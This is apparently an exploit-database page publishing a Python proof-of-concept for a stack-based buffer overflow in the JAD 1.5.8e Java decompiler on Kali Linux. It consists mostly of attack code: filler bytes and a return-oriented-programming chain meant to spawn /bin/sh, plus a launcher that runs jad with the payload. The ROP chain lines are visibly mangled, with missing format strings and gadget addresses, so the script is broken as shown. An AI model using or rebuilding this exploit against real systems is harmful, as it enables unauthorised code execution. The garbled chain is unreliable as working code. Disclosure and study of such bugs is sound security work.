JAD 1.5.8e-1kali1 Buffer Overflow

JAD 1.5.8e-1kali1 Buffer Overflow


JAD version 1.5.8e-1kali1 suffers from a stack-based buffer overflow vulnerability, triggered by an overlong command-line argument.


MD5 | 2b1879456767fcc7e710df4a24db0153

#!/usr/bin/python
# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com
# Developed using Exploit Pack - http://exploitpack.com

# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is prone to a
# stack-based buffer overflow vulnerability because the application fails to
# perform adequate boundary-checks on its command-line argument (the PoC below
# passes one overlong argv entry to jad).
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application, i.e. with the privileges of whoever runs jad on an
# attacker-supplied argument (jad is a local command-line tool, so on its own
# this is not remotely reachable). Failed exploit attempts will result in a
# denial-of-service condition (jad crashes).
#
# Package details:
# Version: 1.5.8e-1kali1
# Architecture: all (package metadata; the ROP chain below is built from i386
# gadgets, so its addresses are presumably only valid for that particular build)
# Maintainer: Devon Kearns
#
# Vendor homepage: http://www.varaneckas.com/jad/
#
# CANARY : disabled
# FORTIFY : disabled
# NX : ENABLED  (stack is not executable, hence a ROP chain instead of inline shellcode)
# PIE : disabled (fixed load address, so hard-coded gadget addresses stay valid on this build)
# RELRO : disabled
#
import errno
import os
import subprocess
from struct import pack

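# Filler up to the saved return address. The 8150-byte offset was presumably
# measured by the author on the Kali 2017.1 build named in the header; it will
# differ on any other build, so re-measure before reuse.
#
# A bytes literal is used on purpose: struct.pack() returns bytes, and the
# `ropchain += pack(...)` lines that follow would raise TypeError on Python 3
# when the filler is a str. On Python 2, b"..." is just str, so nothing changes.
#
# NOTE(review): the pack() lines that follow were mangled when this listing was
# extracted -- the format strings and gadget addresses are missing and only the
# ROPgadget-style trailing comments (pop edi ; pop ebp ; ret, '/bin', '//sh')
# survive -- so the chain cannot be reconstructed from this page and the script
# is not runnable as shown.
OFFSET_TO_RET = 8150
ropchain = b"A" * OFFSET_TO_RET  # junk (filler)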
ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += '/bin'
ropchain += pack('ebx ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += '//sh'
ropchain += pack('ebx ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ebx ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('
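# Launch the target with the payload as a single argv entry. List form means
# no shell is involved, so nothing re-interprets the chain before jad sees it.
# print() calls throughout (the original mixed Python 2 print statements with
# print() calls, which is a SyntaxError on Python 3); with a single argument
# the output is identical on both versions.
print("[*] JAD 1.5.8 Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
try:
    rc = subprocess.call(["jad", ropchain])
except OSError as e:
    # Compare against errno.ENOENT: os.errno was an undocumented alias and
    # was removed in Python 3.7.
    if e.errno == errno.ENOENT:
        print("JAD not found!")
    else:
        print("Error executing exploit")
        raise
else:
    # subprocess.call() returns -signal when the child is killed by a signal.
    # A crash here means the overflow fired but the chain did not land -- the
    # denial-of-service outcome the header warns about.
    if rc < 0:
        print("[-] jad died with signal %d (overflow triggered, payload did not land)" % -rc)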
